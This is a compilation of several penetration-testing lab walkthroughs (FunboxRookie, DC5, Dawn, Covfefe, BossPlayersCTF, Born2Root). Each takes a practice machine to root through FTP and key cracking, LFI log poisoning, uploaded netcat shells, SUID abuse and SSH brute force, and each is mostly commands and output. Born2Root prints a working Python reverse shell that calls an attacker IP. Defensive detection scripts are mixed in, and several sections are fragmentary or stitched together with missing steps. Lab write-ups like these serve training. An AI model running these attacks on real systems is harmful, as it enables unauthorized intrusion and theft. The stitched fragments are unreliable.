pg-funboxrookie-play
Exploitation Guide for FunboxRookie
Summary
This machine is exploited via an anonymous FTP server that exposes an archive containing a user's id_rsa key, followed by the disclosure of user credentials in a history file. Privileges are escalated via an open sudo rule that allows the user to run any command with elevated privileges.
Enumeration
Nmap
We start off by running an nmap scan:
kali@kali:~$ sudo nmap 192.168.120.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:07 EDT
Nmap scan report for 192.168.120.138
Host is up (0.032s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
We can run a more detailed nmap scan with the -sC flag against the discovered ports:
kali@kali:~$ sudo nmap -p 21,22,80 192.168.120.138 -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:09 EDT
Nmap scan report for 192.168.120.138
Host is up (0.030s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip
22/tcp open ssh
| ssh-hostkey:
| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open http
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
The FTP server listening on the default port allows for anonymous logins, and we see several zip files listed.
Exploitation
Anonymous FTP Server
Of the files shown in the scan, only file tom.zip will prove useful to us. Next, we can log in and retrieve it:
kali@kali:~$ ftp 192.168.120.138
Connected to 192.168.120.138.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.120.138]
Name (192.168.120.138:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.118.3 !
230-
230-The local time is: Wed Oct 14 17:11:13 2020
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get tom.zip
local: tom.zip remote: tom.zip
200 PORT command successful
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
226 Transfer complete
1477 bytes received in 0.00 secs (28.1715 MB/s)
ftp> bye
221 Goodbye.
kali@kali:~$
However, if we try to open the archive, we will find that it is password-protected.
Password Bruteforce
We can use zip2john to convert the encrypted archive to a hash file usable by john:
kali@kali:~$ zip2john tom.zip > tom.hash
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6
kali@kali:~$
We can now use john and the rockyou.txt wordlist to crack the password:
kali@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2020-10-14 13:17) 100.0g/s 409600p/s 409600c/s 409600C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~$
The cracker succeeds and reveals that the password is iubire. Using it, we can unlock the archive:
kali@kali:~$ unzip -P iubire tom.zip
Archive: tom.zip
inflating: id_rsa
kali@kali:~$
We have obtained a private SSH key file id_rsa.
SSH
Since we have obtained the private key from the archive tom.zip, we can assume that the user is named tom. Next, we will set proper key file permissions and then SSH to the target:
kali@kali:~$ chmod 0600 id_rsa
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138
...
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
tom@funbox2:~$
Escaping Restricted Shell
But if we try to change directory or run any of the other restricted commands, we will find that our default shell upon login is rbash, which we must first escape:
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
-rbash: cd: restricted
tom@funbox2:~$
There are many ways to do so, and we will choose one of the easiest ones (exiting the current shell and then reconnecting with the flag -t "bash --noprofile"):
tom@funbox2:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to 192.168.120.138 closed.
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138 -t "bash --noprofile"
load pubkey "id_rsa": invalid format
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
tom@funbox2:/home$
We are now able to traverse and enumerate the system further.
Escalation
User Password Recovery
Looking around the user’s home directory, we find a MySQL history file:
tom@funbox2:/home$ cd ~
tom@funbox2:~$ ls -la
...
-rw------- 1 tom tom 295 Jul 25 12:04 .mysql_history
...
tom@funbox2:~$
In this file, we see the history of several MySQL commands:
tom@funbox2:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$
The command insert\040into\040support\040(tom,\040xx11yy22!); looks very interesting, as it contains the string xx11yy22!, which looks like a password.
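The leaked history file above is exactly what a secret-scanning check should catch. The following Python is an added example, not part of the original writeup: it decodes the libedit `_HiStOrY_V2_` octal escaping seen in `.mysql_history` and flags statements that carry credential-looking literals. The sample history and the detection heuristics are constructed for illustration.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample in the libedit "_HiStOrY_V2_" format used by .mysql_history:
# whitespace is stored as octal escapes (\040 is a space), as seen on the box.
SAMPLE_HISTORY = r"""_HiStOrY_V2_
show\040databases;
create\040database\040support;
use\040support
insert\040into\040support\040(tom,\040xx11yy22!);
alter\040user\040'tom'@'localhost'\040identified\040by\040'S3cret!';
quit
"""

OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")
# Statements that by definition carry a secret as a literal.
AUTH_KEYWORDS = re.compile(r"(?i)\b(identified\s+by|set\s+password|password\s*\()")
# INSERT statements: inspect the parenthesised literal list for password-like tokens.
INSERT_LITERALS = re.compile(r"(?i)^\s*insert\s+into\b.*\((.*)\)")


def decode_history_line(line: str) -> str:
    """Undo libedit escaping: \\NNN (octal) becomes the escaped character."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), line)


def parse_mysql_history(text: str) -> List[str]:
    """Return decoded statements, dropping the version header and blank lines."""
    lines = text.splitlines()
    if lines and lines[0] == "_HiStOrY_V2_":
        lines = lines[1:]
    return [decode_history_line(ln) for ln in lines if ln.strip()]


def looks_like_secret(token: str) -> bool:
    """Heuristic: at least 6 chars mixing letters with digits or punctuation."""
    token = token.strip("'\"")
    if len(token) < 6:
        return False
    has_alpha = any(c.isalpha() for c in token)
    has_digit = any(c.isdigit() for c in token)
    has_punct = any(not c.isalnum() for c in token)
    return has_alpha and (has_digit or has_punct)


def scan_history(text: str) -> List[Tuple[str, str, Optional[str]]]:
    """Return (rule, statement, suspicious_token) for each credential-like statement."""
    findings = []
    for stmt in parse_mysql_history(text):
        if AUTH_KEYWORDS.search(stmt):
            findings.append(("auth-keyword", stmt, None))
            continue
        m = INSERT_LITERALS.match(stmt)
        if m:
            for tok in re.split(r"[,\s]+", m.group(1)):
                if tok and looks_like_secret(tok):
                    findings.append(("insert-literal", stmt, tok))
                    break
    return findings


if __name__ == "__main__":
    for rule, stmt, tok in scan_history(SAMPLE_HISTORY):
        print(f"[{rule}] {stmt}" + (f"  <- {tok}" if tok else ""))
```

Run against a real `~/.mysql_history` (or `.bash_history`, which uses no escaping) the same scanner gives a quick inventory of secrets that a `chmod 600` alone does not protect once the account is compromised.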
Sudo Escalation
Trying this password to enumerate sudo privileges works, and we see that user tom is able to run any command with sudo when providing the password:
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tom may run the following commands on funbox2:
(ALL : ALL) ALL
tom@funbox2:~$
We can easily use this to get a root shell:
tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom#
pg-dc5-play
DC5
Port 80 on the target machine takes us to the following web page. Multiple sub-pages include non-English text, and after translating random paragraphs I found this is mostly gibberish.
Clicking the home button takes us to the same page but we notice this time we are on /index.php. I then ran feroxbuster against the target site to identify more pages.
Checking out contact.php, it appears to be the only page that takes some form of input.
After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page.
At this point I decided to test thankyou.php? for command injection. I caught the request in Burpsuite and sent it to Intruder. I then set the payload variable as below.
I then added the command injection list as shown below as the payload.
Ensure URL encoding is turned off, as this was causing incorrect results by encoding '?'.
Viewing the results of the payload afterwards shows that the ?file= parameter appears to be vulnerable, as its content length is greatly different from the other values.
Viewing this in the browser shows us valid results.
We can fuzz for further files using wfuzz and the command below:
The LFI list can be downloaded from here
We have two interesting LFI paths found once wfuzz completes:
Checking out access.log we can see requests we have made.
We can capture a request in Burpsuite
and inject a PHP reverse shell into the User-Agent field. When the code is injected into the log we are able to get a reverse shell.
Where the code snippet below is used for the RCE:
With a netcat listener listening we can then access the log files again at: http://192.168.211.26/thankyou.php?file=../../../../../../../var/log/nginx/access.log
When we attempt to load the log files the page should hang and we get a reverse shell.
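The same access log that gets poisoned above is where a defender would spot this chain. The following Python is an added example (not from the original writeup): it parses nginx combined-format lines and flags directory traversal in query values, LFI requests that read the server's own log files, and PHP open tags arriving in the User-Agent or Referer. The log lines and the IP addresses in them are constructed.

```python
import re
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx combined-format log lines modelling the chain above: an LFI probe
# that reads the server's own access log, a URL-encoded traversal sent with a poisoned
# User-Agent, and one ordinary request.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Oct/2020:17:20:01 +0000] "GET /thankyou.php?file=../../../../../../../var/log/nginx/access.log HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Oct/2020:17:21:13 +0000] "GET /thankyou.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1832 "-" "<?php echo 'poisoned'; ?>"
10.0.0.7 - - [14/Oct/2020:17:22:40 +0000] "GET /contact.php HTTP/1.1" 200 2211 "http://example.test/index.php" "curl/7.72.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r"\.\.[/\\]")
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
LOG_FILES = ("access.log", "error.log", "auth.log")


class Finding(NamedTuple):
    line_no: int
    ip: str
    rule: str
    detail: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def fully_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e%252f) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(text: str) -> List[Finding]:
    """Flag traversal in query values, LFI reads of log files, and PHP tags in UA/Referer."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        query = urlsplit(rec["target"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                decoded = fully_unquote(value)
                if TRAVERSAL.search(decoded):
                    findings.append(Finding(n, rec["ip"], "lfi-traversal", f"{param}={decoded}"))
                if decoded.endswith(LOG_FILES):
                    findings.append(Finding(n, rec["ip"], "log-file-read", f"{param}={decoded}"))
        # Anything the client controls that ends up in the log is a poisoning vector.
        for field in ("ua", "referer"):
            if PHP_TAG.search(rec[field]):
                findings.append(Finding(n, rec["ip"], "log-poisoning", f"{field}: {rec[field]}"))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f.line_no} {f.ip} [{f.rule}] {f.detail}")
```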
Searching for SUID commands on the machine finds that the binary screen-4.5.0 has the SUID bit set.
Researching on Google shows a local privilege escalation exploit for this binary version.
We first need to create some files and break down the script to get this to work. Follow the instructions below to achieve shell.
Compile libhax.c
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
Compile rootshell.c
gcc -o /tmp/rootshell /tmp/rootshell.c
Create exploit bash script.
Upload compiled files to target machine.
Once uploaded make the bash script executable:
Execute exploit.sh, then run /tmp/rootshell to gain a shell as root.
pg-dawn-play
Dawn
On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.
kali@kali:~/dawn$ smbclient -U '' -L \\\\192.168.55.11\\
Enter WORKGROUP\'s password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
kali@kali:~/dawn$
kali@kali:~/dawn$ smbclient -U '' \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020
7158264 blocks of size 1024. 3518364 blocks available
smb: \>
curl to test for file upload on the share and confirmed I was able to upload a PHP reverse shell, which might come in handy later.
Enter host password for user '':
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5496 0 0 100 5496 0 536k --:--:-- --:--:-- --:--:-- 596k
kali@kali:~/dawn$
dirsearch.py on port 80 reveals two interesting directories. Moving into logs shows a list of logs where management.log is the only one we have permission to access.
When reading the log file we have the lines below appearing frequently.
Knowing that we have write access to the ITDEPT share, we can upload a reverse shell, call it web-control, and in theory this should execute.
Firstly I created a file called web-control and inserted a netcat reverse shell into it.
This was then uploaded to the SMB share.
smb: \> put web-control
putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s)
smb: \> ls
. D 0 Thu Sep 2 09:34:20 2021
.. D 0 Wed Jul 22 13:19:41 2020
rev.php A 5496 Thu Sep 2 09:13:41 2021
web-control A 83 Thu Sep 2 09:38:54 2021
7158264 blocks of size 1024. 3518292 blocks available
smb: \>
After doing so I soon receive a shell back on my netcat listener.
kali@kali:~/dawn$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
zsh as having the SUID bit set.
www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
zsh is a shell binary, so all we need to do is execute the full path of zsh to gain a root shell.
www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
dawn# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# cd /root
cd /root
dawn# ls
ls
flag.txt proof.txt
dawn# cat flag.txt
cat flag.txt
Your flag is in another file...
dawn# cat proof.txt
cat proof.txt
04bf91ebc2de37fbee66338c45a80b95
dawn#
pg-covfefe-play
Covfefe
I started off with port 80 and was unable to identify any directories or files. The default page on this port is the nginx installation page.
When attempting to browse to port 31337 we are given a 404 not found error. I then ran dirsearch.py against the port using the command below, which discovered what appeared to be a user's home directory contents.
Browsing to the /.ssh directory lists the folder's contents.
I first downloaded the id_rsa and then authorized_keys.
Viewing the contents of authorized_keys shows the user simon having a key in the file. First use chmod on the id_rsa to set the correct permissions.
When attempting to use the key to connect by SSH we are prompted to provide a passphrase.
Using ssh2john we can convert the key to a hash which can be sent to John for cracking.
Now that we have the password starwars for the key we can try signing in again.
I then transferred over linpeas and executed it. Linpeas then identified the binary /usr/local/bin/read_message as having the SUID bit set.
Running the binary and entering the name 'Simon' produces the following output:
As per the message we can read the source code. Listing the contents of the root directory shows the source code file.
As per the source, it reads the first 5 characters to validate the name but has a total buffer of 20. We can try to overflow the buffer to execute a command.
Running the following when prompted to do so by the binary will give us a root shell.
pg-bossplayersctf-play
BossPlayersCTF
Port 80 shows the following page.
Viewing the source code of this page reveals text at the end.
We can take this string and decode it with base64. We need to do this three times to reveal a plain-text string.
Browsing to workingprogress.php:
Looking at the comment regarding ping we can take a guess for command injection on the current page. Appending ?cmd=(command) generates results.
To create a reverse shell run the following command in a terminal:
Then take the base64 output and run it as a command in the web browser.
This will create a reverse shell connection on our netcat listener.
I then transferred linpeas over from my attacking machine. Shortly after running, linpeas finds that the binary 'find' has the SUID bit set.
Checking this against GTFOBins shows we can use this to gain a root shell.
Run the following command to spawn a root shell:
pg-born2root-play
Exploitation Guide for Born2Root
Summary
Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.
Enumeration
Nmap
We initiate our enumeration of the target by launching two nmap scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.
kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39832/tcp6 status
| 100024 1 47504/udp status
| 100024 1 50443/udp6 status
|_ 100024 1 52205/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have a web server running on port 80 and when browsing to the website, we find a company web page with general and contact related information.
We should take note of the username martin that appears twice on this page: in the About Us section and in the Contact Us section.
GoBuster
We will use GoBuster to do a brute force scan in an attempt to discover any other folders present on the web server using the common.txt wordlist.
kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...
Gobuster finds a directory named /icons containing a text file VDSoyuAXiO.txt. This file contains an SSH Key. We will download the key and save it to a file.
kali@kali:~$ curl http://192.168.54.49/icons/VDSoyuAXiO.txt >> born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----
Exploitation
Local SSH Access
Let’s give this key proper permissions and then use it to SSH as martin (we can just hit enter when prompted for secret password).
kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh martin@192.168.120.52 -i born
...
READY TO ACCESS THE SECRET LAB ?
secret password :
WELCOME !
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)
Escalation
Local Enumeration
Checking all the cronjobs scheduled on the system, we find a python file that is readable, and the cronjob is scheduled for a user named Jimmy.
martin@debian:~$ cat /etc/cron*
...
*/5 * * * * jimmy python /tmp/sekurity.py
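The weakness here is a cron job whose script lives in a world-writable directory, which a routine audit of the system crontab should catch. The following Python is an added example (not from the original guide): it parses /etc/crontab-style entries (with the user field), extracts the program or script each job runs, and reports any target that sits in a world-writable directory or is writable by group/other. The crontab excerpt and the fake filesystem modes are constructed; the real check would use the default os.stat lookup.

```python
import os
import re
import shlex
import stat
from typing import Callable, List, NamedTuple, Optional, Tuple

# Constructed /etc/crontab excerpt modelled on the one found on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * jimmy python /tmp/sekurity.py
@reboot root /usr/local/bin/backup.sh
"""

# Constructed stand-in for the target filesystem: path -> st_mode.
# /tmp/sekurity.py is deliberately absent: on the box anyone could create it.
FAKE_FS = {
    "/etc/cron.hourly": stat.S_IFDIR | 0o755,
    "/usr/local/bin/backup.sh": stat.S_IFREG | 0o777,  # group/world writable
}

WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "ruby", "php"}


class CronJob(NamedTuple):
    schedule: str
    user: str
    command: str


def parse_system_crontab(text: str) -> List[CronJob]:
    """Parse /etc/crontab-style lines (with a user field); skips comments and VAR=value."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        nsched = 1 if line.startswith("@") else 5  # @reboot etc. vs. m h dom mon dow
        parts = line.split(None, nsched + 1)
        if len(parts) < nsched + 2:
            continue
        jobs.append(CronJob(" ".join(parts[:nsched]), parts[nsched], parts[nsched + 1]))
    return jobs


def executed_paths(command: str) -> List[str]:
    """Return the program or script each shell segment of a cron command runs."""
    paths = []
    for segment in re.split(r"\s*(?:&&|\|\||;|\|)\s*", command):
        words = [w for w in shlex.split(segment) if not re.match(r"^\w+=", w)]
        if not words:
            continue
        if os.path.basename(words[0]) in INTERPRETERS:
            # interpreter + script: the script is the first non-option argument
            script = next((w for w in words[1:] if not w.startswith("-")), None)
            if script:
                paths.append(script)
        elif words[0].startswith("/"):
            paths.append(words[0])
    return paths


def default_mode_lookup(path: str) -> Optional[int]:
    try:
        return os.stat(path).st_mode
    except OSError:
        return None


def audit_crontab(text: str,
                  mode_lookup: Callable[[str], Optional[int]] = default_mode_lookup
                  ) -> List[Tuple[str, str, str]]:
    """Return (user, path, reason) for every cron target a non-owner could replace."""
    findings = []
    for job in parse_system_crontab(text):
        for path in executed_paths(job.command):
            if path.startswith(WORLD_WRITABLE_DIRS):
                findings.append((job.user, path, "lives in a world-writable directory"))
                continue
            mode = mode_lookup(path)
            if mode is not None and mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((job.user, path,
                                 f"writable by group/other (mode {stat.S_IMODE(mode):04o})"))
    return findings


if __name__ == "__main__":
    for user, path, reason in audit_crontab(SAMPLE_CRONTAB, FAKE_FS.get):
        print(f"{user}: {path}: {reason}")
```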
Reverse Shell
We can copy a Python reverse shell into /tmp/sekurity.py, make it executable with chmod +x sekurity.py, and wait 5 minutes for the cronjob to execute it.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.63.200",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.
After a few minutes, we catch our shell:
kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.49.54] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$
SSH Login Brute-Force
Let’s check /etc/passwd to get a list of available users on the system:
jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash
The user Hadi stands out as another user also mentioned on the company website.
kali@kali:~$ cat /usr/share/wordlists/rockyou.txt | grep hadi > /home/kali/hadi.txt
I then used the text file with Hydra to bruteforce SSH which actually worked.
Now we can try brute-forcing the password for the user hadi using Hydra:
kali@kali:~$ hydra -t 4 -l hadi.txt -P passwords-mutated.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.120.52:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.120.52 login: hadi password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26
We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password:
jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Escalation to Root
The password for root was re-used and is the same as hadi's: hadi123.
hadi@debian:~$ su -
Password:
root@debian:~# whoami
root
explained
root@debian:/var/spool/cron# cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
root@debian:/var/spool/cron#
THE RABBIT HOLE
